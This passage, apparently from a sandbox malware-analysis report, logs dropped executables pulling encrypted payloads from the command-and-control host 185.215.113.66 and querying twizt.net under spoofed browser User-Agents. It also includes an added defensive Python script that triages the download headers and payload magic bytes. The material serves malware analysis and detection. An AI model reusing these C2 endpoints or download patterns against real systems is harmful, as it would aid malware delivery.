                                                                              May 8, 2024 15:22:53.829298973 CEST | 1289 | IN | Data Raw: 93 5f 6b ef 50 05 9e 69 25 3f 3f 17 47 85 2c 6b 90 92 25 c7 a4 33 c7 b4 ac 01 9f 3c 52 af 59 f7 8f 8c b2 8a 34 83 28 21 34 2c 08 b5 72 a3 55 ed 44 21 fc 8e 2b ad 22 49 d4 df 89 7f 22 e5 ce 47 01 f3 e1 b7 6a 95 90 ad a6 27 76 0c 70 18 34 86 d8 a7
                                                                              Data Ascii: _kPi%??G,k%3<RY4(!4,rUD!+"I"Gj'vp494lqQ " [t%/ ,2wUJSxon2F;DI`yMis)p#{x1mWRHFpwYmv.J]%x;U'i%?^`}ihtPA
                                                                              May 8, 2024 15:22:53.829318047 CEST | 1289 | IN | Data Raw: 1c c3 ae 56 be 98 01 6b 9c 1a 7b 08 4e 4a 39 5c 07 87 b3 5b 4f 13 bd 3b 89 f5 de 91 7a 53 87 d5 e3 12 66 87 50 62 62 19 16 47 a1 87 f9 8f 51 ef 1e 4c dd 49 0a 9c c2 51 5f ab bf 5f b4 35 c7 5a 28 84 16 e7 9a 31 36 4e dd 67 f8 5e e6 4a 7b c3 bf 40
                                                                              Data Ascii: Vk{NJ9\[O;zSfPbbGQLIQ__5Z(16Ng^J{@>!HvxGA#J=$SI7l(f^43<P7Xic&mRwaRX_wj15^W:nkv0ExG"F&XI'7K7E"4 gX
                                                                              May 8, 2024 15:22:53.829340935 CEST | 1289 | IN | Data Raw: 4f 94 78 c2 97 9b 63 5e be 60 17 93 29 44 bc d5 ec a9 b6 b4 08 90 51 3b 5d 99 88 3b 5e 0f 58 59 77 af 85 ff 08 65 fb e3 41 d7 e2 f9 54 96 02 47 8a ce 86 0b 91 33 f7 77 7b 52 57 56 74 07 cd bb f0 14 bb 02 b2 59 41 06 90 c8 43 63 75 9f 12 f7 70 b7
                                                                              Data Ascii: Oxc^`)DQ;];^XYweATG3w{RWVtYACcup__BTY,q"KGCQ3c0QC/|xB.Lv?X;Wg;cJrm%3Spc[!%dt y>yw{%dg)(Yr]srX!z
                                                                              May 8, 2024 15:22:53.829361916 CEST | 1289 | IN | Data Raw: bb fc df 8d e3 0f af 38 97 7e 3c 5b 6a cb 09 b4 59 74 22 8d fb a9 0d f1 60 29 df 4e 90 14 35 9a 75 0a 76 65 4c b0 d5 9a 19 e2 87 dc e0 08 6c 3e d0 b6 f5 62 5c c2 fa 20 19 ef 55 b1 e0 ff 82 1b bf b5 10 12 e3 25 c3 9b 9d 61 84 57 33 23 b2 87 f1 d7
                                                                              Data Ascii: 8~<[jYt"`)N5uveLl>b\ U%aW3#|puO"^?,C5cRaCO($yf"[GH7me0_[1Da$q9&{|oj5o6vT(eWnS-kI<ZV#~sX
                                                                              May 8, 2024 15:22:53.829379082 CEST | 1289 | IN | Data Raw: aa 7c 5a 5d 16 d5 71 76 1e 04 c2 b4 d4 90 34 09 eb 56 cd 7d 84 8a 26 c8 b1 15 0d 92 67 ca fe b5 0f b7 5c cc 00 c7 55 08 91 20 53 0e 48 8e e0 75 2e 1a e9 cb 22 b9 eb bc 82 2c 7a 68 56 bd 3a 42 de 02 c6 de 61 ff 10 46 0a 83 2d 97 2a 29 9e 7b 31 05
                                                                              Data Ascii: |Z]qv4V}&g\U SHu.",zhV:BaF-*){1:eU{TjoM{;4gb\rxa"-)*K,K\Id-J\x/AT^)cv_21sc|u7l&{oIt<'2IU;?!E<
                                                                              May 8, 2024 15:22:53.829396963 CEST | 1289 | IN | Data Raw: ff 96 34 ff be 9f d7 1d 17 ae 97 a3 e3 1f 25 28 7f a0 76 42 96 9e 6b b3 fb 60 26 c6 18 ac ad fe b7 7a 33 c2 a5 df e6 1a 43 e0 e2 cb e8 3f 38 1c db 04 16 a1 a1 17 a5 e7 10 cb 46 d6 d5 05 02 4d 80 0d ec d3 b7 fc 89 ae ee 3c cb 96 1f cf ef 7f e1 75
                                                                              Data Ascii: 4%(vBk`&z3C?8FM<ue\`O?)m<[nh7RpUT j%#0JjyAsY@Vy8jmtf"|y#3)JG<*0YnhP,I#]a%>+Y
                                                                              May 8, 2024 15:22:53.829413891 CEST | 1289 | IN | Data Raw: cc c0 d5 f6 76 58 dc 93 86 0a 7a 73 31 1b 86 f2 99 0b 0a c3 29 1f 18 eb 34 62 30 4f 97 68 7a a7 2b e4 dc 7f 15 02 1c 92 a5 dc 04 bc d8 80 89 c1 7d 31 8d cc 5e 00 3e d9 dd 36 a0 29 2a e4 f0 03 d2 9f fb 5e 89 a7 a8 88 0c db 7f 02 b8 4c 9a 20 b8 99
                                                                              Data Ascii: vXzs1)4b0Ohz+}1^>6)*^L hJL3j104-D.0(C"krOB/Wye(m?hH/"'>X,0Yv*Mhl,]=.R~RO.qS5T{U
                                                                              May 8, 2024 15:22:53.829516888 CEST | 1289 | IN | Data Raw: 19 89 96 e9 56 0f 9a 8c 19 b7 05 b4 27 39 21 25 b2 29 35 03 7e f7 f4 ad 75 ff 9f e3 00 20 68 f1 05 5f ae 80 44 41 3a 4f 23 2f d7 4a 79 1a 22 03 77 bd b2 c1 38 a8 21 72 fd 82 f9 23 8d bb de 86 5e 3b f3 ee 08 66 59 00 6d a4 13 79 80 f3 31 29 63 8f
                                                                              Data Ascii: V'9!%)5~u h_DA:O#/Jy"w8!r#^;fYmy1)cWz=9pHjje,]GcDOB)9l)VWdRyl}$C^dC$#nK/tmd}#x,<f7#[e|/")UN+LG.ouX$Js=
                                                                              May 8, 2024 15:22:53.829591990 CEST | 1289 | IN | Data Raw: b0 92 f6 3f 1d 3a a3 f2 72 e7 3c ab 2a 56 d3 0e 3d 84 af 84 17 ae fe f6 bf 04 fa eb a8 21 04 10 46 12 99 06 c0 53 db bb dc 0e e4 b2 22 b6 5c 5d 9c 7b 01 fa 03 3e 6e 9b 77 dc 88 bb 7a fb a2 03 db 1e 8b 86 87 65 f2 56 a1 a8 9b f0 68 45 e3 9b 87 f2
                                                                              Data Ascii: ?:r<*V=!FS"\]{>nwzeVhES#n1KBCiD]p(Eqf$c&WhTos_49KJAZqRW'[LZE/+]RsLgQ_<OvqKKmL}:pfj^qh fW]
                                                                              May 8, 2024 15:22:54.169622898 CEST | 1289 | IN | Data Raw: ae 13 d9 3c 80 95 1b 13 9e 3f c9 4c 70 f0 19 fc 72 a9 9d 72 9d 76 2d af 9d 78 f3 f8 ea f0 1a 30 30 f2 bc d5 d3 68 75 96 42 e1 16 bf 93 0f ed bd b7 9c 3a 47 ce 12 12 56 20 bf 54 2c 55 54 a9 64 4b e6 87 6a 07 a1 d0 67 f7 7d 50 da fd f5 9c 78 6d fc
                                                                              Data Ascii: <?Lprrv-x00huB:GV T,UTdKjg}PxmZyo!DaH,1$DSP<*J2m-Fhr&:O(d?QhBQ<Mh_)p"b,~b[KWZ5f:Gz}j[6,gXiR6
                                                                              May 8, 2024 15:23:00.527477980 CEST | 166 | OUT | GET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:00.867768049 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:00 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]


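Sessions 6 to 8 show one host, 185.215.113.66, serving /3, /4, /5, /_2 and /_3 as application/octet-stream to two different dropped executables that present three different browser User-Agent strings. Two checks an analyst would run over such a capture are a first-bytes triage of what came back (the /3 and /_2 bodies start with 4e 47 53 21, "NGS!", not with an MZ header, so they are not plain PE images as served) and a consistency check of the nginx ETag, which for static files is "<mtime hex>-<size hex>", against Content-Length and Last-Modified. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code; its SAMPLE records are constructed from header values visible in this report (sessions 6, 7 and the /_2 fetch of session 8), the 16-byte body prefixes are transcribed from the Data Raw columns, and every helper name and the "ngs-container" label are this example's own.

```python
"""Triage of the HTTP download sessions recorded in this report (added example)."""
import re
from datetime import timezone
from email.utils import parsedate_to_datetime

# Values below are transcribed from sessions 6-8 of the report; the record
# layout, helper names and the 16-byte body prefixes form a constructed
# sample, not a pcap export.
C2 = "185.215.113.66"
SYSBRAPSVC = r"C:\Windows\sysbrapsvc.exe"
UA_MSIE7 = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
            ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")
UA_CHROME124 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
UA_CHROME121 = UA_CHROME124.replace("124.0.0.0", "121.0.0.0")


def _exchange(session, pid, process, path, ua, length, last_modified, etag, body_hex):
    """One GET and its 200 response, rebuilt from the report's header values."""
    return {
        "session": session, "pid": pid, "process": process,
        "request": f"GET {path} HTTP/1.1\r\nUser-Agent: {ua}\r\nHost: {C2}\r\n\r\n",
        "response": ("HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"
                     "Content-Type: application/octet-stream\r\n"
                     f"Content-Length: {length}\r\nLast-Modified: {last_modified}\r\n"
                     f'ETag: "{etag}"\r\n\r\n'),
        "body_head": bytes.fromhex(body_hex),   # first 16 bytes of the body
    }


SAMPLE = [
    _exchange(6, 5588, SYSBRAPSVC, "/3", UA_MSIE7, 81928,
              "Wed, 24 Apr 2024 23:29:53 GMT", "662995f1-14008",
              "4e47532100020000f701b2600c255836"),
    _exchange(7, 5588, SYSBRAPSVC, "/4", UA_CHROME124, 22272,
              "Wed, 08 May 2024 11:20:38 GMT", "663b6006-5700",
              "9f990720de8d44f2f613dfbc7b008292"),
    _exchange(8, 2060, r"C:\Users\user\AppData\Local\Temp\1146722911.exe", "/_2",
              UA_CHROME121, 9224, "Tue, 07 May 2024 18:30:40 GMT", "663a7350-2408",
              "4e47532100020000ccda9cefc19697c6"),
]

_NGINX_ETAG = re.compile(r'^(?:W/)?"([0-9a-fA-F]+)-([0-9a-fA-F]+)"$')


def parse_http(raw):
    """Split one HTTP message into (start line, {lower-cased header: value})."""
    head = raw.partition("\r\n\r\n")[0].split("\r\n")
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return head[0], headers


def classify_body(head):
    """Cheap first-bytes triage of a downloaded blob."""
    if head.startswith(b"MZ"):
        return "pe"
    if head.startswith(b"NGS!"):
        return "ngs-container"   # magic seen in this capture; its format is not documented here
    return "opaque"


def nginx_etag_consistent(etag, content_length, last_modified):
    """nginx builds static-file ETags as '<mtime hex>-<size hex>'; check both halves."""
    m = _NGINX_ETAG.match(etag.strip())
    if not m:
        return False
    mtime, size = int(m.group(1), 16), int(m.group(2), 16)
    dt = parsedate_to_datetime(last_modified)
    if dt.tzinfo is None:                        # defensive: treat a naive value as UTC
        dt = dt.replace(tzinfo=timezone.utc)
    return size == int(content_length) and mtime == int(dt.timestamp())


def build_iocs(sessions):
    """Reduce each exchange to the fields an analyst would pivot on."""
    records = []
    for s in sessions:
        req_line, req = parse_http(s["request"])
        status_line, resp = parse_http(s["response"])
        path = req_line.split(" ", 2)[1]
        records.append({
            "session": s["session"], "pid": s["pid"], "process": s["process"],
            "url": f"http://{req['host']}{path}",
            "user_agent": req.get("user-agent", ""),
            "status": int(status_line.split(" ", 2)[1]),
            "content_length": int(resp["content-length"]),
            "body_kind": classify_body(s["body_head"]),
            "etag_consistent": nginx_etag_consistent(
                resp["etag"], resp["content-length"], resp["last-modified"]),
        })
    return records


def distinct_user_agents(records):
    """Several spoofed UAs against one host from one sample is itself a signal."""
    return sorted({r["user_agent"] for r in records})


if __name__ == "__main__":
    for rec in build_iocs(SAMPLE):
        print(rec)
```

The ETag check passes for every response shown in these sessions, which is consistent with plain files on disk behind nginx rather than content generated per request; the identical ETag "663b6006-5700" and Last-Modified for /4 in sessions 6 and 7 show the same file was fetched twice. The "ngs-container" label only records the observed magic; the report does not say what the container is, and the example makes no claim about it.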
                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.8 | 49719 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:22:56.215485096 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:56.561414957 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:56 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:56.561429977 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:56.561443090 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:22:56.561491966 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:22:56.561506987 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:22:56.561968088 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:22:56.561980963 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:22:56.561992884 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB
May 8, 2024 15:23:03.404200077 CEST | 167 | OUT | GET /_3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:23:03.747179031 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:03 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Tue, 07 May 2024 18:30:44 GMT
Connection: keep-alive
ETag: "663a7354-2408"
Accept-Ranges: bytes


Session ID: 9
Source IP: 192.168.2.8
Source Port: 49721
Destination IP: 185.215.113.66
Destination Port: 80
PID: 5588
Process: C:\Windows\sysbrapsvc.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:23:02.218699932 CEST | 166 | OUT | GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:23:02.561400890 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:02 GMT
Content-Type: application/octet-stream
Content-Length: 8960
Last-Modified: Mon, 06 May 2024 15:56:03 GMT
Connection: keep-alive
ETag: "6638fd93-2300"
Accept-Ranges: bytes
May 8, 2024 15:23:08.638293982 CEST | 166 | OUT | GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:23:08.981136084 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:08 GMT
Content-Type: application/octet-stream
Content-Length: 11520
Last-Modified: Sat, 04 May 2024 13:18:06 GMT
Connection: keep-alive
ETag: "6636358e-2d00"
Accept-Ranges: bytes


Session ID: 10
Source IP: 192.168.2.8
Source Port: 49722
Destination IP: 185.215.113.66
Destination Port: 80
PID: 2060
Process: C:\Users\user\AppData\Local\Temp\1146722911.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:23:05.119743109 CEST | 167 | OUT | GET /_3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:23:05.460170031 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:05 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Tue, 07 May 2024 18:30:44 GMT
Connection: keep-alive
ETag: "663a7354-2408"
Accept-Ranges: bytes


Session ID: 11
Source IP: 192.168.2.8
Source Port: 49723
Destination IP: 185.215.113.66
Destination Port: 80
PID: 2068
Process: C:\Users\user\AppData\Local\Temp\330125677.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:23:08.219573975 CEST | 168 | OUT | GET /ALLSTATA HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: twizt.net
May 8, 2024 15:23:08.563103914 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:08 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 12
Source IP: 192.168.2.8
Source Port: 49724
Destination IP: 185.215.113.66
Destination Port: 80
PID: 5588
Process: C:\Windows\sysbrapsvc.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:23:10.341459990 CEST | 166 | OUT | GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:23:10.685848951 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:23:10 GMT
Content-Type: application/octet-stream
Content-Length: 11520
Last-Modified: Sat, 04 May 2024 13:18:06 GMT
Connection: keep-alive
ETag: "6636358e-2d00"
Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 